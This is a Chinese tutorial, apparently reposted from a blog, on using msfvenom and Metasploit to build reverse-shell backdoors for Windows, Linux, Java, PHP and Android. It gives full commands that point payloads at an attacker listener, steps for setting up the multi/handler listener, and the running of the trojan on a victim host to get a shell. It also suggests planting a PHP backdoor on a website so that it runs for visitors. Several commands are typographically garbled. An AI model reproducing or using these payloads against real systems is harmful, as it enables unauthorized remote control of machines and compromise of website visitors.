MSF-Shellcode生成和使用

简介:

1      使用环境

Kali 2.0

msfvenom

2      Msfvenom参数说明

msfvenom –h    查看帮助

说明:

Options:

     -p, --payload     <payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定

     -l, --list       [module_type]   列出指定模块的所有可用资源模块类型包括: payloads, encoders, nops, all

     -n, --nopsled     <length>        payload预先指定一个NOP滑动长度

     -f, --format      <format>        指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)

     -e, --encoder    [encoder]       指定需要使用的encoder(编码器)

     -a, --arch        <architecture>  指定payload的目标架构

         --platform    <platform>      指定payload的目标平台

     -s, --space       <length>        设定有效攻击荷载的最大长度

     -b, --bad-chars   <list>          设定规避字符集,比如: &#039;\x00\xff&#039;

     -i, --iterations <count>          指定payload的编码次数

     -c, --add-code    <path>          指定一个附加的win32 shellcode文件

     -x, --template    <path>          指定一个自定义的可执行文件作为模板

     -k, --keep                        保护模板程序的动作,注入的payload作为一个新的进程运行

         --payload-options            列举payload的标准选项

     -o, --out   <path>               保存payload

     -v, --var-name <name>             指定一个自定义的变量,以确定输出格式

         --shellest                   最小化生成payload

     -h, --help                        查看帮助选项

         --help-formats               查看msf支持的输出格式列表

 

2.1  命常用帮助命令

msfvenom --help-formats     查看有哪些格式输出

wKioL1hI3gjjOgNAAAKV6ft_ZBg812.png

 

msfvenom -l encoders       查看有哪些编码方式

3      Metasploit生成多种后门

Metasploit可以生成各种格式的后门,有phpexewindows下后门)、linux环境下后门,java后门、androiw后门等等。

可以生成aspaspxphpjspwarexe等多种类型

 

现在已经没有msfpayload的命令了,换成msfvenom了。里面集成了msfpayloadmsfencode

 

 

3.1  生成window下后门程序

使用以下模块生成windows系统下后门程序。

windows/meterpreter/reverse_tcp

 

生成木马程序时如果可以指定也可以不指定--arch x86 --platform windows,不指定则会报错提示,不用理会,-p后写指定的payload-f后指定文件格式。

msfvenom -p windows/meterpreter/reverse_tcpLHOST=192.168.1.115 LPORT=1234 -f exe > /aaa.exe

wKiom1hI3gjCzLlRAAEhv5HcAtg646.png

或者指定参数如下:

使用生成木马命令:

msfvenom -p windows/meterpreter/reverse_tcp--arch x86 --platform windows LHOST=192.168.1.115 LPORT=1234 -f exe >/aaa.exe

wKiom1hI3grgcyihAAGOFKMRwpw668.png

 

被中木马的机器IP地址是192.168.1.123

把在kali的根目录生产的木马程序aaa.exe文件拷贝到被攻击的机器上面去192.168.1.123上。

wKioL1hI3grxmHt_AAAwG5Oy2vg956.png

 

======================================================

设置监听:

使用监听模块:use exploit/multi/handler

wKiom1hI3omS5xzOAAM1eEthijI757.png


使用payload

wKioL1hI3orBrXS8AAC0_eD-OpQ566.png

 

wKioL1hI3vSiuE59AAaTqxI1GbM981.png

wKioL1hI3vXSBlhrAADfgOhiA8c563.png

wKiom1hI3vmR-ASJAAWCwoV2iA4762.png

执行监听

wKioL1hI3vqiYBb_AAEdIp1abUM618.png

 

=================================================

 

在被攻击的机器上面双机运行aaa.exe木马,此时在kali上面观看结果如下:

说明192.168.1.123已经被中木马了,可以控制此机器了。

wKiom1hI312AsSEiAALBjjKRbWg696.png

 

通过输入shell来进入控制台控制机器。

wKioL1hI316C0BdaAAF7T_kB1T8718.png

 

查看机器的ip地址是否是192.168.1.123

wKiom1hI32Dg0ZWWAAMjAOpZyzo807.png

3.2  生成linux下后门程序

使用以下模块生成linux后门程序,操作方法跟windows后门使用一样。

linux/x86/shell_reverse_tcp

 

windows系统唯一的区别是在linux下生成的木马需要给这个程序可执行的权限,通过使用以下命令chmod

Chmod +x 程序名

 

linux下执行木马程序命令:

./程序名

3.3  生成Java后门程序

Java程序在windows下和在linux下都可以生效执行的

 

使用以下模块生成后门程序:

java/meterpreter/reverse_tcp

 

生成木马命令:

msfvenom -p java/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x> /jar.jar

wKioL1hI36GC_UTJAACer3BdfFw366.png


3.4  生成PHP后门程序

使用模块:

php/meterpreter/reverse_tcp

 

生成木马命令:

msfvenom -p php/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x> /php.php

wKiom1hI36LitgJEAAIZIEum3Ag514.png

 

把生成的木马php文件放到网站上面,当别人访问的时候就会执行。

3.5  生成Android后门程序

使用模块:

android/meterpreter/reverse_tcp

 

生成木马命令:

msfvenom -p android/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x> /android.apk

wKioL1hI382wVcoCAAJWs0jEjm4508.png

 



本文转自 老鹰a  51CTO博客,原文链接:http://blog.51cto.com/laoyinga/1880673

相关文章
|
4月前
|
安全 Windows
抓获Backdoor.Gpigeon.voo和Trojan.PSW.OnlineGames.xd等盗号木马
抓获Backdoor.Gpigeon.voo和Trojan.PSW.OnlineGames.xd等盗号木马
|
存储 安全 网络协议
1.12 进程注入ShellCode套接字
在笔者前几篇文章中我们一直在探讨如何利用`Metasploit`这个渗透工具生成`ShellCode`以及如何将ShellCode注入到特定进程内,本章我们将自己实现一个正向`ShellCode`Shell,当进程被注入后,则我们可以通过利用NC等工具连接到被注入进程内,并以对方的权限及身份执行命令,该功能有利于于Shell的隐藏。本章的内容其原理与`《运用C语言编写ShellCode代码》`中所使用的原理保持一致,通过动态定位到我们所需的网络通信函数并以此来构建一个正向Shell,本章节内容对`Metasploit`工具生成的Shell原理的理解能够起到促进作用。
|
存储 Serverless 数据安全/隐私保护
1.9 动态解密ShellCode反弹
动态解密执行技术可以对抗杀软的磁盘特征查杀。其原理是将程序代码段中的代码进行加密,然后将加密后的代码回写到原始位置。当程序运行时,将动态解密加密代码,并将解密后的代码回写到原始位置,从而实现内存加载。这种技术可以有效地规避杀软的特征码查杀,因为加密后的代码通常不会被标记为恶意代码。
|
安全 Shell 网络安全
MSF框架讲解
MSF框架讲解
|
数据安全/隐私保护
Powershell免杀系列(二)
Powershell免杀系列(二)
332 0
|
存储 算法 安全
Cobaltstrike4.0 —— shellcode分析(三)
Cobaltstrike4.0 —— shellcode分析
362 0
|
存储 算法 安全
Cobaltstrike4.0 —— shellcode分析(二)
Cobaltstrike4.0 —— shellcode分析
310 0
|
存储 算法 安全
Cobaltstrike4.0 —— shellcode分析(一)
Cobaltstrike4.0 —— shellcode分析
431 0
|
Web App开发 Shell Windows
在msf和powershell中利用hotpotato进行提权
本文讲的是在msf和powershell中利用hotpotato进行提权,通过类似SMB协议的NTLM认证已经被微软修补了,不过HTTP到SMB正在使用这种验证,并且还用于创建高权限服务中。因为流量包中含有NTLM凭据并且正在通过伪代理服务器,因此可以将其捕获并传递到本地SMB侦听器,作为SYSTEM权限执行任何命令。
2531 0
|
Web App开发 安全 JavaScript
MSF6
目前msfvenom工具已经取代了metasploit-framework旗下的msfpayload(载荷生成器)和msfencoder(编码器)。

热门文章

最新文章